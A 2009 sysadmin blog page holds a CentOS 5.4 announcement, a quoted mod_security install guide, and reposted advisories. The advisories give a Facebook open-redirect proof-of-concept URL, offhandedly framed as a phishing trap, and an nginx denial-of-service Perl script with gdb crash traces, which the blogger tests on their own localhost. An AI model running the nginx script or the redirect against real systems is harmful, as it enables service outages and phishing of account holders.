Wednesday, October 28, 2009

Centos 5.4

The CentOS team is pleased to announce the availability of CentOS 5.4. Major changes in CentOS 5 compared to CentOS 4 include:

These updated software versions: Apache-2.2, php-5.1.6, kernel-2.6.18, Gnome-2.16, KDE-3.5, OpenOffice.org-2.3, Evolution-2.12, Firefox-3.0, Thunderbird-2.0, MySQL-5.0, PostgreSQL-8.

Better desktop support with compiz and AIGLX.

Virtualization provided by the Xen hypervisor with Virtual Machine Manager and libvirt.

Major changes compared to earlier CentOS 5 versions include:

KVM as a preview for the new virtualization technology in Enterprise Linux.

ext4 as a technology preview in file systems.

Source : www.centos.org

download from local ix ( Indonesia )

http://mirror.unej.ac.id/centos/5.4/isos/i386/

Monday, October 26, 2009

Sql injection and mod security - black and white

this noon , we read mail from someone and he claim he find sql injection in our site , how it can be ... , magic quota still off and mod_security not yet installed

see this article

from : http://www.cyberciti.biz/faq/rhel-fedora-centos-httpd-mod_security-configuration/

Red Hat / CentOS Install mod_security Apache Intrusion Detection And Prevention Engine

by Vivek Gite

How do I install ModSecurity - an open source intrusion detection and prevention engine for web applications under CentOS / RHEL / Red Hat Enterprise Linux 5.x server?

ModSecurity operates embedded into the web server (httpd), acting as a powerful umbrella - shielding web applications from attacks. In order to use mod_security, you need to turn on EPEL repo under CentOS / RHEL Linux. Once repo is turned on, type the following command to install ModSecurity:
# yum install mod_security
Sample output:

Loaded plugins: downloadonly, fastestmirror, priorities, protectbase
Loading mirror speeds from cached hostfile
* epel: www.gtlib.gatech.edu
* base: mirror.skiplink.com
* updates: centos.aol.com
* addons: mirror.cs.vt.edu
* extras: mirror.trouble-free.net
0 packages excluded due to repository protections
Setting up Install Process
Parsing package install arguments
Resolving Dependencies
--> Running transaction check
---> Package mod_security.x86_64 0:2.5.9-1.el5 set to be updated
--> Finished Dependency Resolution

Dependencies Resolved

Package Arch Version Repository Size

Installing:
mod_security x86_64 2.5.9-1.el5 epel 935 k

Transaction Summary

Install 1 Package(s)
Update 0 Package(s)
Remove 0 Package(s)

Total download size: 935 k
Is this ok [y/N]: y
Downloading Packages:
mod_security-2.5.9-1.el5.x86_64.rpm | 935 kB 00:00
Running rpm_check_debug
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing : mod_security [1/1]

Installed: mod_security.x86_64 0:2.5.9-1.el5
Complete!

mod_security configuration files

1. /etc/httpd/conf.d/mod_security.conf - main configuration file for the mod_security Apache module.
2. /etc/httpd/modsecurity.d/ - all other configuration files for the mod_security Apache.
3. /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf - Configuration contained in this file should be customized for your specific requirements before deployment.
4. /var/log/httpd/modsec_debug.log - Use debug messages for debugging mod_security rules and other problems.
5. /var/log/httpd/modsec_audit.log - All requests that trigger a ModSecurity events (as detected) or a serer error are logged ("RelevantOnly") are logged into this file.

Open /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf file, enter:
# vi /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf
Make sure SecRuleEngine set to "On" to protect webserver for the attacks:

SecRuleEngine On

Turn on other required options and policies as per your requirements. Finally, restart httpd:
# service httpd restart
Make sure everything is working:
# tail -f /var/log/httpd/error_log

see your file in

/var/log/httpd/

modsec_debug.log
modsec_audit.log

Congratulation : Global Conference on Open Source (GCOS)

Sunday, October 25, 2009

Redirect and Phising Facebook

This night very smooth just open my eyes and read the security around the world, facebook is the biggest social community and there are people can make the application like games , quiz and etc.

Can we Phising that ?... of course ...

have u read this

http://www.packetstormsecurity.com/0910-exploits/facebook-redir.txt

_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________


# [+] Facebook Redirection
#
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
#
#[------------------------------------------------------------------------------------]
#
# [+] How use ?
#
# http://apps.facebook.com/quizzname/?next=[Redirection]
#
# [+] PoC :
#
# http://apps.facebook.com/quelendroitltwgzmv/?next=http://www.google.com
#
#[------------------------------------------------------------------------------------]

"Redirect Method" can make the trap , be carefull with your account facebook

check your nginx

http://www.packetstormsecurity.com/0910-exploits/nginx-dos.txt

debian:~# uname -a Linux debian 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC
2009 i686 GNU/Linux
debian:~# cat /etc/issue
Debian GNU/Linux 4.0 \n \l

debian:~# dpkg -l|grep nginx
ii nginx 0.4.13-2+etch2 small, but very powerful and efficient
debian:~# ps xauwww|grep worker|grep -v grep
www-data 3577 0.0 0.9 2688 928 ? S 01:50 0:00 nginx: worker process
debian:~# gdb -p 3577
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
Attaching to process 3577
Reading symbols from /usr/sbin/nginx...(no debugging symbols found)...done.
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Reading symbols from /lib/tls/i686/cmov/libcrypt.so.1...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libcrypt.so.1
Reading symbols from /usr/lib/libpcre.so.3...(no debugging symbols
found)...done.
Loaded symbols for /usr/lib/libpcre.so.3
Reading symbols from /usr/lib/libz.so.1...(no debugging symbols
found)...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /lib/tls/i686/cmov/libc.so.6...
(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_compat.so.2...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_compat.so.2
Reading symbols from /lib/tls/i686/cmov/libnsl.so.1...(no debugging symbols
found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnsl.so.1
Reading symbols from /lib/tls/i686/cmov/libnss_nis.so.2...
(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_nis.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_files.so.2...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_files.so.2
Failed to read a valid object file image from memory.
0xb7f06410 in ?? ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x08068f23 in ?? ()
(gdb) bt
#0 0x08068f23 in ?? ()
#1 0x080b0540 in ?? ()
#2 0x080a54e4 in ?? ()
#3 0x00000000 in ?? ()
(gdb) i r
eax 0x6d4 1748
ecx 0xbff21028 -1074655192
edx 0x80b1794 134944660
ebx 0x80b0540 134939968
esp 0xbff21880 0xbff21880
ebp 0xbff218d8 0xbff218d8
esi 0x80b5630 134960688
edi 0x80b0540 134939968
eip 0x8068f23 0x8068f23 <__gmon_start__@plt+126827>
eflags 0x10206 [ PF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) q
The program is running. Quit anyway (and detach it)? (y or n) y
Detaching from program: /usr/sbin/nginx, process 3577
debian:~#

in nginx error log we can see :
2009/10/15 01:53:24 [alert] 2477#0: worker process 3577 exited on signal 11

===============================

here is same test on nginx compiled with debug :

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
ngx_http_process_request_headers (rev=0x80c95d8) at
src/http/ngx_http_request.c:793
793 header.data[header.len++] = '.';
(gdb) bt
#0 ngx_http_process_request_headers (rev=0x80c95d8) at
src/http/ngx_http_request.c:793
#1 0x08069c63 in ngx_http_process_request_line (rev=0x80c95d8) at
src/http/ngx_http_request.c:702
#2 0x080668ff in ngx_http_init_request (rev=0x80c95d8) at
src/http/ngx_http_request.c:446
#3 0x0805f67e in ngx_epoll_process_events (cycle=0x80a59e8, timer=60000,
flags=)
at src/event/modules/ngx_epoll_module.c:518
#4 0x08056712 in ngx_process_events_and_timers (cycle=0x80a59e8) at
src/event/ngx_event.c:245
#5 0x0805cebd in ngx_worker_process_cycle (cycle=0x80a59e8, data=0x0) at
src/os/unix/ngx_process_cycle.c:728
#6 0x0805b9b1 in ngx_spawn_process (cycle=0x80a59e8, proc=0x805c8a2
, data=0x0,
name=0x808e46b "worker process", respawn=-2) at
src/os/unix/ngx_process.c:187
#7 0x0805c470 in ngx_start_worker_processes (cycle=0x80a59e8, n=1, type=-2)
at src/os/unix/ngx_process_cycle.c:327
#8 0x0805d442 in ngx_master_process_cycle (cycle=0x80a59e8) at
src/os/unix/ngx_process_cycle.c:119
#9 0x0804ae5b in main (argc=1, argv=0xbfd72ac4) at src/core/nginx.c:332
(gdb) i r $eip
eip 0x8068e52 0x8068e52
(gdb)

===============================

tested on versions 0.7.0 <= 0.7.61, 0.6.0 <= 0.6.38, 0.5.0 <= 0.5.37, 0.4.0
<= 0.4.14

================================
here is POC:

#!/usr/bin/perl
use IO::Socket;
if ($#ARGV != 0) {
print "Usage: ./nginx.pl \n";
exit;}
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');
$mysize = 4079;
$mymsg = "o" x $mysize;
print $sock "GET /$mymsg HTTP/1.1\r\n\r\n";

while(<$sock>) {
print;
}


I try to check nginx version see this

[root@vx066-findtoyou-cen ~]# rpm -qa | grep nginx
nginx-0.6.39-1.el5
[root@vx066-findtoyou-cen ~]# vi nginx.pl
[root@vx066-findtoyou-cen ~]# vi nginx.pl
[root@vx066-findtoyou-cen ~]# perl nginx.pl 127.0.0.1
HTTP/1.1 400 Bad Request
Server: nginx/0.6.39
Date: Sat, 24 Oct 2009 20:29:33 GMT
Content-Type: text/html
Content-Length: 173
Connection: close

[root@vx066-findtoyou-cen ~]# ./nginx.pl 127.0.0.1
bash: ./nginx.pl: Permission denied
[root@vx066-findtoyou-cen ~]# chmod +x nginx.pl
[root@vx066-findtoyou-cen ~]# ./nginx.pl 127.0.0.1
HTTP/1.1 400 Bad Request
Server: nginx/0.6.39
Date: Sat, 24 Oct 2009 20:30:06 GMT
Content-Type: text/html
Content-Length: 173
Connection: close


and please check your nginx now :) .........